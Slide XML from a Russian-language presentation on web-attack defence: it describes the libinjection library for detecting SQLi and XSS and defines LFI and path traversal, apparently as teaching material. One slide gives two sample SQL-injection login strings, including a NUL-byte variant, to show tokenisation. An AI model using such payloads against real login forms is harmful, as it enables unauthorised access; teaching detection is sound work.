              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>– это библиотека C для обнаружения инъекции SQL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>) и межсайтового </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>скриптинга</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> (XSS) посредством лексического анализа реальных атак. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> и другие инъекционные атаки остаются главной уязвимостью OWASP и CERT. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="TT Hoves"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>Представляет из себя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>таблицу преобразований запроса в токены</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="TT Hoves"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" dirty="0">
              <a:latin typeface="TT Hoves"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Текст 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3385291-2A41-49D6-8F06-1AD7E9D8D95B}"/>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ru-RU" sz="1200" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA36171-A235-4B04-BF50-95FEC2E3F97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2387600" y="310757"/>
            <a:ext cx="7416800" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold"/>
              </a:rPr>
              <a:t>Libinjection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400"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099348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A490A811-893E-B7C6-4BA8-3932D272D56E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356686" y="1592263"/>
            <a:ext cx="11079531" cy="1122224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Пример защиты </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>от </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>с помощью библиотеки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Libinjection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Приложению приходят два разных запроса:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> …/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> 1=1 –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> …/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>=abc'%00or+true#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Каждый из них раскладывается на токены </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Рисунок 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D44C72-6C82-02B0-B5CC-DB9F501BC5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2874" y="3226552"/>
            <a:ext cx="8580842" cy="2532985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Текст 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A91463E-F50D-4A84-9E63-1BC3C8021E7F}"/>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ru-RU" sz="1200" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC00F69-B584-46AC-887B-9FC1F9FB8DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2387600" y="310757"/>
            <a:ext cx="7416800" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold"/>
              </a:rPr>
              <a:t>Libinjection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400"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4005819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7E0433BB-557D-4234-AC27-74F91A27D8DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640264" y="898072"/>
            <a:ext cx="8738935" cy="833746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="6600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="6600" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold"/>
              </a:rPr>
              <a:t>LFI, Path Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="5400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3134151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C04015D-CC07-A93F-2A13-D686F851A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1708499"/>
            <a:ext cx="5268686" cy="3297717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Текст 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FA999A8-1726-4A0B-81A2-FEBA5652B561}"/>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LFI, Path Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D7F1A86-B62C-49A9-B5A1-13ED3827CF20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1582340"/>
            <a:ext cx="5268686" cy="3693319"/>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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>LFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t> - это возможность использования и выполнения локальных файлов на серверной стороне. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:latin typeface="TT Hoves"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>Уязвимость </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>позволяет удаленному пользователю получить доступ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>с помощью специально сформированного запроса к произвольным файлам на сервере, в том числе содержащую конфиденциальную информацию.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:latin typeface="TT Hoves"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>Проще говоря, это </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>уязвимость открытия файлов с сервера + недостаточная фильтрация</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>, что позволяет открывать произвольный файл.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E18E68B0-CF5E-4C07-83D2-6EFDA47F71CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2387600" y="310757"/>
            <a:ext cx="7416800"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LFI – Local File Inclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3322549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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C445277A-9731-E874-CA2E-6FAE3F02F661}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356686" y="1692033"/>
            <a:ext cx="11040657" cy="1532353"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>Эта брешь присутствует там, где </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>отсутствует корректная обработка входных данных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>, которой может манипулировать злоумышленник, инжектировать символы типа </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>включать другие файлы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>с веб-сервера.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="ru-RU" sz="1800" dirty="0">
              <a:latin typeface="TT Hoves"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:latin typeface="TT Hoves"/>
              </a:rPr>
              <a:t>Рассмотрим пример:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Текст 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7F5E33-9812-4CE7-8009-FECFC3C2E5B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LFI, Path Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Текст 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9435D195-F97F-4977-AE6D-8DDD901A547D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2668202" y="517090"/>
            <a:ext cx="6855596" cy="517487"/>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="ru-RU" sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="ru-RU" sz="1400"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Clr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="ru-RU" sz="1200"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Clr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="ru-RU" sz="1100"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Clr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="ru-RU"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4400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves DemiBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07CE4D3D-1E1B-4F8A-989B-44E5D55B1447}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442913" y="3633615"/>
            <a:ext cx="10954431" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
